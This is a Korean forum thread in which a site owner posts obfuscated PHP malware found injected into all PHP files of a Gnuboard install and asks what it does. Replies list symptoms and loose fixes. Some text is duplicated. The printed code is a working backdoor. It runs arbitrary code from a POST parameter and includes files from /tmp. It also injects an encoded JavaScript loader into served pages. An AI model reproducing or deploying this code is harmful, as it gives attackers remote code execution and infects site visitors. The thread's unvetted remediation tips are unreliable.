이 코드가 뭔지 좀 봐주세요... 정보
이 코드가 뭔지 좀 봐주세요...
본문
제 사이트의 그누폴더에 있는 php 파일에 전부 이런 코드가 삽입되어 있는데...어떻게 들어갔는지..누가 넣었는지도 모르겠지만...하여튼 골때리는 일이 발생했네요...
코드 내용은 다음과 같습니다...이게 파일의 앞 부분은 혹은 뒷부분에 붙어 있어요...
=============================================================================================
<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIApldmFsKHVuZXNjYXBlKCdgJTJGYCUyRiQlMkUlMkUlMkUAfCUzQ34lNjQlNjl2QCUyMH4lNzN0fiU3OWxlJTNEQCU2NHxpfnMlNzB+bCMlNjEkJTc5YDohbiU2RiZuJTY1fCUzRVxuYGQmJTZGI2MlNzVtJTY1JCU2RSU3NCUyRSElNzdyYGl0JTY1JCUyOCUyMiUzQyMlMkYlNzRlJCU3OGB0JCU2MX4lNzJlYCU2MSUzRSImJTI5ITskJTc2QCU2MXIlMjAlNjklMkN8JTVGfCUyQ2AlNjEmPSU1QiJAJTMyJCUzMSUzOH4lMkU5fDMkJTJFJTMyfiUzMCQlMzIlMkUlMzZAMSUyMiwkJTIyJiUzOSQlMzQkJTJFJTMyITR8N2AlMkUyfiUyRTU4IyUyMn4lNUQ7JTVGJCUzRH4xJTNCJTY5JTY2fCUyOGR+b3wlNjMlNzVtJTY1Jm4hdCEuYGMlNkZ8b3wlNkIhJTY5JCU2NSQlMkUlNkR+JTYxJCU3NCU2M2BoKGAvYCU1QyU2MiU2OH5nJiU2NnR+PSUzMSUyRiYpfD09fG5+dWxgbCl+JTY2JTZGcnwlMjhpISUzRCUzMCUzQmklM0MlMzJAJTNCJiU2OSUyQnwrJTI5IWRgb2N+JTc1YG18ZUBufiU3NC4lNzclNzJpJCU3NCU2NSUyOCUyMiUzQyU3MyU2MyQlNzIlNjkkJTcwJnQlM0VpfCU2NiUyOCZfKX4lNjQlNkYlNjN1JTZEfiU2NW5+dCQlMkV8JTc3cml0JTY1JTI4JTVDIn4lM0MlNzMkJTYzQCU3MmkkJTcwJCU3NCUyMH4lNjlgZH49QF8lMjIraUArIl8lMjBzJCU3Mn5jJCUzRCMvYC9AInwrYVsjaWAlNUQhJTJCIkAvY2AlNzAvQCUzRUAlM0MlNUMlNUMkJTJGJTczQGMhcn5pcEB0JTNFfiU1Q0AlMjIhJTI5fiUzQ2AlNUMvJTczJCU2MyU3MmAlNjkhJTcwfnQjJTNFJiUyMiYlMjkjJTNCYFxuLyUyRiYlM0MkJTJGfCU2NGklNzYlM0UnKS5yZXBsYWNlKC9AfGB8XCZ8XCF8I3xcfHxcJHx+L2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
=====================================================================================
고수님들께서 이게 뭐하는 코든지 봐주시고...혹 이게 그누의 취약점을 뚫고 들어온게 아닌가 싶은데...혹시 앞으로 이런걸 방지하는데 도움이 될까싶어 여기다 문의 올려요...ㅜㅜ
코드 내용은 다음과 같습니다...이게 파일의 앞 부분은 혹은 뒷부분에 붙어 있어요...
=============================================================================================
<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIApldmFsKHVuZXNjYXBlKCdgJTJGYCUyRiQlMkUlMkUlMkUAfCUzQ34lNjQlNjl2QCUyMH4lNzN0fiU3OWxlJTNEQCU2NHxpfnMlNzB+bCMlNjEkJTc5YDohbiU2RiZuJTY1fCUzRVxuYGQmJTZGI2MlNzVtJTY1JCU2RSU3NCUyRSElNzdyYGl0JTY1JCUyOCUyMiUzQyMlMkYlNzRlJCU3OGB0JCU2MX4lNzJlYCU2MSUzRSImJTI5ITskJTc2QCU2MXIlMjAlNjklMkN8JTVGfCUyQ2AlNjEmPSU1QiJAJTMyJCUzMSUzOH4lMkU5fDMkJTJFJTMyfiUzMCQlMzIlMkUlMzZAMSUyMiwkJTIyJiUzOSQlMzQkJTJFJTMyITR8N2AlMkUyfiUyRTU4IyUyMn4lNUQ7JTVGJCUzRH4xJTNCJTY5JTY2fCUyOGR+b3wlNjMlNzVtJTY1Jm4hdCEuYGMlNkZ8b3wlNkIhJTY5JCU2NSQlMkUlNkR+JTYxJCU3NCU2M2BoKGAvYCU1QyU2MiU2OH5nJiU2NnR+PSUzMSUyRiYpfD09fG5+dWxgbCl+JTY2JTZGcnwlMjhpISUzRCUzMCUzQmklM0MlMzJAJTNCJiU2OSUyQnwrJTI5IWRgb2N+JTc1YG18ZUBufiU3NC4lNzclNzJpJCU3NCU2NSUyOCUyMiUzQyU3MyU2MyQlNzIlNjkkJTcwJnQlM0VpfCU2NiUyOCZfKX4lNjQlNkYlNjN1JTZEfiU2NW5+dCQlMkV8JTc3cml0JTY1JTI4JTVDIn4lM0MlNzMkJTYzQCU3MmkkJTcwJCU3NCUyMH4lNjlgZH49QF8lMjIraUArIl8lMjBzJCU3Mn5jJCUzRCMvYC9AInwrYVsjaWAlNUQhJTJCIkAvY2AlNzAvQCUzRUAlM0MlNUMlNUMkJTJGJTczQGMhcn5pcEB0JTNFfiU1Q0AlMjIhJTI5fiUzQ2AlNUMvJTczJCU2MyU3MmAlNjkhJTcwfnQjJTNFJiUyMiYlMjkjJTNCYFxuLyUyRiYlM0MkJTJGfCU2NGklNzYlM0UnKS5yZXBsYWNlKC9AfGB8XCZ8XCF8I3xcfHxcJHx+L2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
=====================================================================================
고수님들께서 이게 뭐하는 코든지 봐주시고...혹 이게 그누의 취약점을 뚫고 들어온게 아닌가 싶은데...혹시 앞으로 이런걸 방지하는데 도움이 될까싶어 여기다 문의 올려요...ㅜㅜ
댓글 전체
제 경험으로는 현재 미국 ixwebhosting 호스팅업체 서버에서만 일어나는 것같습니다. 한 서버에 20개의도메인이 있는데 위의 코드가 계속 복제되면서 일어납니다. 일어나는 현상은.
1. body 태그가 있는 부분 다음에 자바스크립트가 삽입되고 삽입된 코드 끝에는 어디서 카피되어왔는지 친절하게 안내해줍니다.
2. 이런 파일수정 현상때 실패하게 되면 파일이 손상되어 가끔 파일이 열리지 않게 됩니다.
3. 그누보드의 adm폴더의 head, tail 부분 하단에도 위와 같은 수상한 코드가 삽입되고,
4. 불땅님의 클럽에 사용된 파일중 club_main, club_index.php 에 있는 iframe 부분만 삭제됩니다.
감염된 홈피의 특징은
1) 갑자기 홈피가 안된다...중요파일 손상때문
2) 접속했는데 뭔가 다운로드 받으려한다. (절대 하면 안되겠죠....)
치료방법
1) 확실한 것은 찾지 못했습니다.
2) 그누보드 최신것으로 패치하시고,
3) 그누보드의 폴더의 이름들을 주기적으로 바꾸시고,
4) 실제적으로는 BODY태그를 없애버리고 css 파일에서 필요한 파일 설정해주세요.
5) 한서버에 복수 도메인 된 것에 문제가 있을 수있습니다. 필요없는 계정등은 삭제하세요.
최종적인 방법은 IXWEBHOSTING 을 떠나시고 새로운 호스팅에서 테스트해보세요. HOSTMONSTER.COM추천합니다.
1. body 태그가 있는 부분 다음에 자바스크립트가 삽입되고 삽입된 코드 끝에는 어디서 카피되어왔는지 친절하게 안내해줍니다.
2. 이런 파일수정 현상때 실패하게 되면 파일이 손상되어 가끔 파일이 열리지 않게 됩니다.
3. 그누보드의 adm폴더의 head, tail 부분 하단에도 위와 같은 수상한 코드가 삽입되고,
4. 불땅님의 클럽에 사용된 파일중 club_main, club_index.php 에 있는 iframe 부분만 삭제됩니다.
감염된 홈피의 특징은
1) 갑자기 홈피가 안된다...중요파일 손상때문
2) 접속했는데 뭔가 다운로드 받으려한다. (절대 하면 안되겠죠....)
치료방법
1) 확실한 것은 찾지 못했습니다.
2) 그누보드 최신것으로 패치하시고,
3) 그누보드의 폴더의 이름들을 주기적으로 바꾸시고,
4) 실제적으로는 BODY태그를 없애버리고 css 파일에서 필요한 파일 설정해주세요.
5) 한서버에 복수 도메인 된 것에 문제가 있을 수있습니다. 필요없는 계정등은 삭제하세요.
최종적인 방법은 IXWEBHOSTING 을 떠나시고 새로운 호스팅에서 테스트해보세요. HOSTMONSTER.COM추천합니다.
흠하하하....현우야..내가 누구게?...........ㅋㅋ
어찌나 나하고 똑같은 생각을 하고 있는지...
나도 지금 hostmonster로 넘어갈려고 알아보고 있는 중이었는데....^^
어찌나 나하고 똑같은 생각을 하고 있는지...
나도 지금 hostmonster로 넘어갈려고 알아보고 있는 중이었는데....^^